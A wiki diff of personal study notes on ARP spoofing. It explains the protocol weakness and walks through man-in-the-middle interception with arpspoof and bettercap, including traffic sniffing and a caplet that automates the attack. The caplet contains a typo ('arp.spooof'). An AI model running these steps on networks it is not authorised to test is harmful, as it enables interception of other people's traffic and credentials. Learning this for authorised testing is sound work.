Differences

This shows you the differences between two versions of the page.

--- hack_postconnect_arpspoofing [2020/05/31 17:50] – gman
+++ hack_postconnect_arpspoofing [2020/05/31 18:11] (current) – [Bettercap ARP Spoof] gman
@@ Line 4: / Line 4: @@
 Test site: http://testphp.vulnweb.com/
+===== ARP Tables =====
+To check ARP Tables in Windows or Linux: ``arp -a``
+If you get too many entries, grep it:
+<code>arp -a | grep ether</code>
+----
+===== ARP Spoofing Attack =====
+**Terms:**
+  * __ARP__: Address Resolution Protocol (maps IP to MAC on a network)
+  * __ARP Request__: broadcast to the network requesting MAC of specific IP
+  * __ARP Response__: client with that IP responds to requester with its MAC address
+Each computer on the network has an ARP table linking IPs with MACs. You use this table to exploit the ARP protocol and set up a MITM spoof.
+  - You spoof the IP/MAC of the router: sent to victim. Causes the victim to update its ARP table and accociate my MAC with router's IP
+  - You spoof the IP/MAC of the victim: sent to router. Causes the router to update its ARP table and associate my MAC with victim's IP
+This effectively puts you in the middle, intercepting traffic between victim and router. The victim thinks you are the router; and the router thinks you are the victim.
+**Why ARP Spoofing works:** Because the protocol itself is not secure...
+  - Clients accept responses even if they did not send a request.
+  - Cients trust responses without any verification.
+So we send an ARP Response to a target and that target will not verify the response. The target will simply update its ARP table with the response I sent it.
+**Tools:** arpspoof, bettercap
+  * These tools only set up the ARP Spoof and redirect traffic to your computer (the put you as the Man in the Middle).
+  * After you set this up, you need to capture and anylize the traffic (with something like Wireshark).
+----
+===== arpspoof =====
+Syntax (usage is always the same):
+<code>
+arpspoof -i [interface] -t [clientIP] [gatewayIP]  # spoofs the client, telling him I am the gateway
+arpspoof -i [interface] -t [gatewayIP] [clientIP]  # spoofs the gateway, telling him I am the client
+</code>
+Example (as root):
+<code>
+arpspoof -i eth0 -t 192.168.0.216 192.168.0.1
+arpspoof -i eth0 -t 192.168.0.1 192.168.0.216
+</code>
+NOTE: You need to enable port forwarding to allow packets to flow through your machine just like a router.
+  * As root: ''echo 1 > /proc/sys/net/ipv4/ip_forward''
+----
+===== Bettercap =====
+Bettercap can do the same thing as arpspoof and more: [[https://www.bettercap.org/modules/ethernet/|docs]].
+Bettercap is a framework to run network attacks:
+  * ARP Spoofing (redirect flow of packets through your machine to analyze, change)
+  * Sniff data (urls, usernames, passwords)
+  * Bypass HTTPS
+  * DNS Spoofing (redirect domain requests)
+  * Inject code in loaded pages
+**Syntax:** ''bettercap -iface [interface]''
+That gets in you into the tool. Type ''help'' to see a menu and the ''help [moduleName]'' to get help on a specific module name you want to use.
+  * At the top of the help information you get syntax to turn on/off, etc.
+  * Under that you get Parameters (options for the module). To change:
+    * Syntax: ''set [option to modify] [true | false]''
+    * Example: ''set arp.spoof.fullduplex true''
+**Module: net.probe** (discover connected clients quickly)
+  * Turn the module on (at bettercap prompt): ''net.probe on''
+  * This will also automatically start the net.recon module (type "help" at prompt to confirm)
+**Module: net.recon**
+  * net.probe sends probe requests to all possible IPs on the network
+  * net.recon monitors ARP cache to take the responses and add them to a list for me to target
+  * net.recon has several commands:
+    * net.show: Show cache hosts list (default sorting by ip).
+----
+===== Bettercap ARP Spoof =====
+Module: arp.spoof (for use, at bettercap prompt: "help arp.spoof")
+  * You MUST have net.probe and net.recon running for this to work.
+. Turn on net.probe if it's not on already
+<code>net.probe on</code>
+. Change module parameter for full duplex (spoof client and router, both):
+<code>set arp.spoof.fullduplex true</code>
+. Change module parameter to add your target client IP (because we set the full-duplex parameter, we do not have to set the gateway, only the client; the gateway/router sets automagically):
+<code>
+set arp.spoof.targets [target IP]
+# or
+set arp.spoof.targets [target IP],[target IP],[target IP]
+</code>
+. Turn ARP spoofing on (see "help arp.spoof") and that's it.
+<code>
+arp.spoof on
+help #to see the modules running
+</code>
+NOTE: If you check our arp table in the client you will see the attach machine's MAC associated with the gateway.
+. To sniff the traffic (still using bettercap; later we'll use Wireshark):
+<code>
+help net.sniff # see the options
+net.sniff on
+</code>
+**Test It:** [[http://testphp.vulnweb.com/|VulnWeb]] (to generate some traffic)
+----
+===== Bettercap Caplets =====
+Caplets are custom scripts for Bettercap (basically text files with commands, one on each line).
+How-To:
+  - Create a text file
+  - On each line put the commands you always run:
+Example (to do all the above when you start Bettercap):
+<code>
+net.probe on
+set arp.spoof.fullduplex true
+set arp.spoof.targets 10.0.0.142
+arp.spooof on
+net.sniff on
+</code>
+To run it:
+<code>bettercap -iface [interface name] -caplet /path/to/caplet.cap</code>
+----